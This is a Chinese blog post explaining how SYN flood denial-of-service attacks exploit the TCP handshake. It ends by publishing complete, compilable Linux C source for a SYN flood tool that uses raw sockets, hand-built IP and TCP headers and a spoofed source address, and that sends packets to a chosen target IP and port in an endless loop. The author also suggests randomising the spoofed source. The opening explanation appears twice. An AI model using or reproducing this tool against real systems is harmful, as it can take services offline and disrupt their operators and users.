标签:des style blog http io os ar 使用 for
0x00 原理
SYN泛洪攻击(SYN Flood)是当前最流行的DoS与DDoS的方式之一,这是由于TCP协议的缺陷造成的。攻击者通过发送大量伪造的TCP连接请求,从而使得被攻击方资源耗尽(CPU满负荷或者内存不足)的攻击方式。
首先要先了解正常情况下的TCP连接建立过程。
(1)客户端发送一个Flag为SYN的TCP报文,并设置一个seq序列号x。
(2)服务器接收到了这个报文,然后立刻发送一个Flag为SYN+ACK的报文,重要的 是服务器也会发送一个seq序列号,作为客户端验证的输入,并且还要回复一个 ack字段来确认,这个ack是x+1,x是客户端第一步发出的seq号码。这时,服 务器会开始分配一些资源,尽管现在连接没有正式建立。
(3)客户端接收到了这个来自服务器的报文之后,再回复一个Flag为ACK的确认报 文,ack自然是服务器端的y再加上1了,这时一个TCP连接才算完全建立。
0x00 原理
SYN泛洪攻击(SYN Flood)是当前最流行的DoS与DDoS的方式之一,这是由于TCP协议的缺陷造成的。攻击者通过发送大量伪造的TCP连接请求,从而使得被攻击方资源耗尽(CPU满负荷或者内存不足)的攻击方式。
首先要先了解正常情况下的TCP连接建立过程。
(1)客户端发送一个Flag为SYN的TCP报文,并设置一个seq序列号x。
(2)服务器接收到了这个报文,然后立刻发送一个Flag为SYN+ACK的报文,重要的 是服务器也会发送一个seq序列号,作为客户端验证的输入,并且还要回复一个 ack字段来确认,这个ack是x+1,x是客户端第一步发出的seq号码。这时,服 务器会开始分配一些资源,尽管现在连接没有正式建立。
(3)客户端接收到了这个来自服务器的报文之后,再回复一个Flag为ACK的确认报 文,ack自然是服务器端的y再加上1了,这时一个TCP连接才算完全建立。
int skfd ; socket(AF_INET,SOCK_RAW,IPPROTO_TCP)
前面提到,要想自行构造IPV4首部,必须要设置相应的socket字段,由于SYN Flood要构造出假的IP来源字段,所以这个地方要注意。这个选项是IP_HDRINCL,如果开启,那么由进程让内核发送的数据的起始位置指的是IP首部的第一个字节,进程调用输出函数写出的数据量必须包括IP首部的大小。整个IP首部由进程构造,不过IPV4标识字段可以置为0,从而告知内核设置该值;另外,IPV4选项字段是可选的。设置socket选项可以使用下面的代码实现:
if(0>setsockopt(skfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on))){
perror("IP_HDRINCL failed");
exit(1);
}
上面的on是一个整型常量,为1。
我们知道,TCP是建立在IP的基础上,所以有了构造IP报文的方法,我们只需要在IP报文的基础上加入TCP报文即可。这就要求我们遵循TCP协议规范,而且还要自己计算出校验和。TCP报文结构定义如下:
//定义TCP报头
typedef struct _tcphdr
{
unsigned short th_sport; //16位源端口
unsigned short th_dport; //16位目的端口
unsigned int th_seq; //32位序列号
unsigned int th_ack; //32位确认号
unsigned char th_lenres; //4位首部长度/4位保留字
unsigned char th_flag; //6位标志位
unsigned short th_win; //16位窗口大小
unsigned short th_sum; //16位校验和
unsigned short th_urp; //16位紧急数据偏移量
} TCP_HEADER;我们只需要在IP报文的基础上填充这些字段并装载在IP包中即可,重点是这里的Flag设置为SYN,校验和字段是要使用伪头计算,伪头的定义如下:
typedef struct psd_hdr
{
unsigned long saddr; //源地址
unsigned long daddr; //目的地址
char mbz;
char ptcl; //协议类型
unsigned short tcpl; //TCP长度
}PSD_HEADER;
在计算校验和的时候必须要小心翼翼,一旦填错会导致包出错。
为了使对方处理的时间增加,我们可以在TCP/IP报文后添加一些填充的信息,将整个包做成最大的64K,这样一来可以使攻击更有效,当然也对自身的带宽有了更大的要求。
报文构造完成之后,接下来就是发送了。原始套接字普通输出通过调用sendto或者sendmsg并指定目的IP地址完成的。当然,如果套接字已经连接,那么也可以调用write或者send发送。
0x02 实现源码分享
执行效果如下:
这是在被攻击主机中的wireshark抓包结果截图。可以看到,10.10.20.132是我伪造的一个IP,而重要的表现是10.10.10.128(被攻击的主机)一直重传SYN+ACK,由于IP地址是伪造的,所以不会收到任何回应,而是一直重发。
这个DoS程序是基于Linux C实现的,因为说实话,我对windows编程实在是不感冒,而且也不会。关于这个程序,可以这样改进,把来源IP做成随机值,但是这里我为了测试就没有这么干。废话不多说,直接上代码。
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include<errno.h>
#include <arpa/inet.h>
#include <linux/tcp.h>
#include<pthread.h>
#include<fcntl.h>
//定义TCP伪报头
typedef struct psd_hdr
{
unsigned long saddr; //源地址
unsigned long daddr; //目的地址
char mbz; char ptcl; //协议类型
unsigned short tcpl; //TCP长度
}PSD_HEADER;
//定义TCP报头
typedef struct _tcphdr
{
unsigned short th_sport; //16位源端口
unsigned short th_dport; //16位目的端口
unsigned int th_seq; //32位序列号
unsigned int th_ack; //32位确认号
unsigned char th_lenres; //4位首部长度/4位保留字
unsigned char th_flag; //6位标志位
unsigned short th_win; //16位窗口大小
unsigned short th_sum; //16位校验和
unsigned short th_urp; //16位紧急数据偏移量
} TCP_HEADER;
//定义IP报头
typedef struct _iphdr
{
unsigned char h_lenver ; //长度加版本号
unsigned char tos; //服务类型
unsigned short total_len; //报文长度
unsigned short ident; //标示,可以置为0
unsigned short frag_and_flags; //标志位
unsigned char ttl; //生存期
unsigned char proto; //协议字段
unsigned short checksum; //校验和
unsigned int sourceIP; //源IP
unsigned int destIP; //目的IP
} IP_HEADER;
// 计算校验和
unsigned short checksum(unsigned short *addr,int len){
int nleft=len;
int sum=0;
unsigned short * w=addr;
unsigned short answer=0;
while (nleft>1)
{
sum+=*w++;
nleft-=2;
}
if (nleft==1)
{
*(unsigned char *)(&answer)=*(unsigned char *)w;
sum+=answer;
}
sum=(sum>>16)+(sum & 0xffff);
sum+=(sum>>16);
answer=~sum;
return(answer);
}
void attack(int skfd,struct sockaddr_in*target,unsigned short srcport){
char buf[65535] = {0} ;
struct _iphdr ip ;
struct _tcphdr tcp ;
int ip_len ;
struct psd_hdr psdheader ;
struct sockaddr_in srcaddr ;
srcaddr.sin_addr.s_addr = inet_addr("10.10.20.132") ;
struct sockaddr_in _target ;
_target.sin_family= AF_INET ;
_target.sin_port = target->sin_port ;
_target.sin_addr.s_addr = target->sin_addr.s_addr ;
ip_len = sizeof(struct iphdr) + sizeof(struct tcphdr) ;
//开始填充IP首部
ip.h_lenver = (4 << 4 | sizeof(ip) / sizeof(unsigned long));
ip.total_len = htons(sizeof(tcp) + sizeof(ip));
//ip包的目的IP地址
ip.destIP = target->sin_addr.s_addr ;
//ip 包的源IP地址(可以伪造)
ip.sourceIP = srcaddr.sin_addr.s_addr ;
//上层协议 TCP
ip.proto = IPPROTO_TCP ;
//3位标志位 可以分段DF=0 后面无包MF=0
ip.frag_and_flags = 0;
//16位校验和
ip.checksum = 0;
//存活期 MAXTTL
ip.ttl = 128 ;
//16位标识
ip.ident = 1;
//开始填充TCP首部
//填充TCP
//目的端口
tcp.th_dport = target->sin_port ;
//源端口
tcp.th_sport = htons(50000) ;
//序列号
tcp.th_seq = htonl(0x1245678);
//确认号
tcp.th_ack = 0;
//(4位首部长度/4位保留字)
tcp.th_lenres = (sizeof(tcp) / 4 << 4 | 0);
//SYN标志
tcp.th_flag = 2 ;//SYN
//滑动窗口
tcp.th_win = htons(16384) ;
//16位紧急数据偏移量
tcp.th_urp = 0;
//16位校验和
tcp.th_sum = 0;
//TCP伪头
psdheader.mbz = 0 ;
psdheader.daddr = target->sin_addr.s_addr ;
psdheader.saddr = srcaddr.sin_addr.s_addr ;
psdheader.ptcl = IPPROTO_TCP ;
psdheader.tcpl = htons(sizeof(tcp)) ;
//计算校验和
memcpy(buf,&psdheader,sizeof(psdheader)) ;
memcpy(buf+sizeof(psdheader),&tcp,sizeof(tcp)) ;
tcp.th_sum = checksum((unsigned short*)buf,sizeof(psdheader)+sizeof(tcp)) ;
//IP校验和
memcpy(buf,&ip,sizeof(ip)) ;
memcpy(buf+sizeof(ip),&tcp,sizeof(tcp)) ;
ip.checksum = checksum((unsigned short*)buf,sizeof(ip)+sizeof(tcp)) ;
memcpy(buf,&ip,sizeof(ip)) ;
//payload
int len = sizeof(buf) - sizeof(ip) - sizeof(tcp) ;
printf("here===>%d\n",len) ;
char payload[len] ;
int i = 0;
for(i=0;i<len;i++){
payload[i] = '2' ;
}
memcpy(buf+sizeof(ip)+sizeof(tcp),payload,sizeof(payload)) ;
//send package
for(;;){
if(sendto(skfd,buf,sizeof(tcp)+sizeof(ip),0,(struct sockaddr*)&_target,sizeof(_target)) == -1){
printf("send error:%s!\n",strerror(errno)) ;
exit(-1) ;
}else{
printf("send OK!\n");
}
}//for
}
int main(int args,char* argv[]){
if(args != 4){
printf("Usage:ddos_attack targetIP targetPort srcPort\n") ;
exit(-1);
}
int skfd ;
struct sockaddr_in target ;
const int on = 1 ;
unsigned short srcport ;
memset(&target,0,sizeof(target)) ;
//填写目标信息
target.sin_family = AF_INET ;
target.sin_port = htons(atoi(argv[2])) ;
target.sin_addr.s_addr = inet_addr(argv[1]) ;
//创建一个原生socket
if((skfd = socket(AF_INET,SOCK_RAW,IPPROTO_TCP)) < 0){
printf("create socket failed!%s\n",strerror(errno));
exit(-1) ;
}
//用模板代码来开启IP_HDRINCL特性,我们完全自己手动构造IP报文
if(0>setsockopt(skfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on))){
perror("IP_HDRINCL failed");
exit(1);
}
//启动攻击函数
srcport = atoi(argv[3]) ;
attack(skfd,&target,srcport) ;
close(skfd) ;
return 0 ;
}
另外,转载请注明出处:http://blog.csdn.net/u011721501?viewmode=list
标签:des style blog http io os ar 使用 for
原文地址:http://blog.csdn.net/u011721501/article/details/40484043
